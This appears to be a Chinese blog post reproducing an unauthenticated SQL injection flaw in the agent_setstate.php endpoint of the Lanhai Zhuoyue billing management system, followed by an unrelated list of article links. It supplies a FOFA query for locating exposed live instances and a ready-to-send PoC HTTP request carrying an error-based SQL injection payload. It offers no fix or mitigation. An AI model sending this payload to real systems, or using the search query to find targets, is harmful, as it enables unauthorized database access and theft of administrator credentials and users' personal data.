当前位置: 首页 > news >正文

蓝海卓越计费管理系统 agent_setstate.php SQL注入漏洞复现

0x01 产品简介

蓝海卓越计费管理系统是一套以实现网络运营为基础,增强全局安全为中心,提高管理效率为目的的网络安全运营管理系统,提供“高安全、可运营、易管理”的运营管理体验,基于标准的RADIUS协议开发,它不仅支持PPPOE和WEB认证计费,还支持802.1X接入控制技术,与其他厂商支持相应标准的产品兼容,结合蓝海卓越的PPPOE服务器网关,可提供更加丰富的功能。,另外,友好的Web访问管理的方式,为用户提供更好用、易用的方式,更贴心的使用形式。

0x02 漏洞概述

蓝海卓越计费管理系统 agent_setstate.php 接口存在SQL注入漏洞,未经身份验证的恶意攻击者利用 SQL 注入漏洞获取数据库中的信息(例如管理员后台密码、站点用户个人信息)之外,攻击者甚至可以在高权限下向服务器写入命令,进一步获取服务器系统权限。

0x03 复现环境

FOFA:title=="蓝海卓越计费管理系统"

0x04 漏洞复现

PoC

GET /agent_setstate.php?id=(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT(0x717a767071,(SELECT%20(ELT(6154=6154,1))),0x7170716a71,0x78))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1
Host: your

相关文章:

  • Stable Diffusion|黑白老照片修复
  • C++简洁版全排列代码
  • 微服务如何做好监控
  • 什么是容器?
  • SpringBootWeb 篇-深入了解 Mybatis 删除、新增、更新、查询的基础操作与 SQL 预编译解决 SQL 注入问题
  • uniapp集成websocket不断线的处理-打牌记账
  • 实战:生成个性化词云的Python实践【7个案例】
  • 六种常用设计模式
  • QT状态机10-QKeyEventTransition和QMouseEventTransition的使用
  • 海外仓储管理系统:提升效率,标准化海外仓管理,科技赋能业务
  • 学习Uni-app开发小程序Day17
  • 前端请求超时截断,axios timeout设置未生效情况记录
  • k8s笔记 | helm包管理
  • Spring 事务源码分析
  • Docker配置国内镜像源
  • 【140天】尚学堂高淇Java300集视频精华笔记(86-87)
  • Android交互
  • Iterator 和 for...of 循环
  • JS创建对象模式及其对象原型链探究(一):Object模式
  • Object.assign方法不能实现深复制
  • React Transition Group -- Transition 组件
  • Redux系列x:源码分析
  • session共享问题解决方案
  • Swift 中的尾递归和蹦床
  • 从零开始在ubuntu上搭建node开发环境
  • 坑!为什么View.startAnimation不起作用?
  • 前端存储 - localStorage
  • 前嗅ForeSpider中数据浏览界面介绍
  • 阿里云重庆大学大数据训练营落地分享
  • # SpringBoot 如何让指定的Bean先加载
  • (1)(1.13) SiK无线电高级配置(五)
  • (2)关于RabbitMq 的 Topic Exchange 主题交换机
  • (C#)if (this == null)?你在逗我,this 怎么可能为 null!用 IL 编译和反编译看穿一切
  • (cljs/run-at (JSVM. :browser) 搭建刚好可用的开发环境!)
  • (Repost) Getting Genode with TrustZone on the i.MX
  • (二)正点原子I.MX6ULL u-boot移植
  • (十八)devops持续集成开发——使用docker安装部署jenkins流水线服务
  • (四)Controller接口控制器详解(三)
  • (万字长文)Spring的核心知识尽揽其中
  • (五)Python 垃圾回收机制
  • (循环依赖问题)学习spring的第九天
  • (译)2019年前端性能优化清单 — 下篇
  • (转)全文检索技术学习(三)——Lucene支持中文分词
  • (转)重识new
  • (自用)learnOpenGL学习总结-高级OpenGL-抗锯齿
  • ***利用Ms05002溢出找“肉鸡
  • .NET Framework 和 .NET Core 在默认情况下垃圾回收(GC)机制的不同(局部变量部分)
  • .NET Reactor简单使用教程
  • .NET/C# 阻止屏幕关闭,阻止系统进入睡眠状态
  • .NET6 命令行启动及发布单个Exe文件
  • .net流程开发平台的一些难点(1)
  • :O)修改linux硬件时间
  • ;号自动换行
  • @Resource和@Autowired的区别
  • [Android 数据通信] android cmwap接入点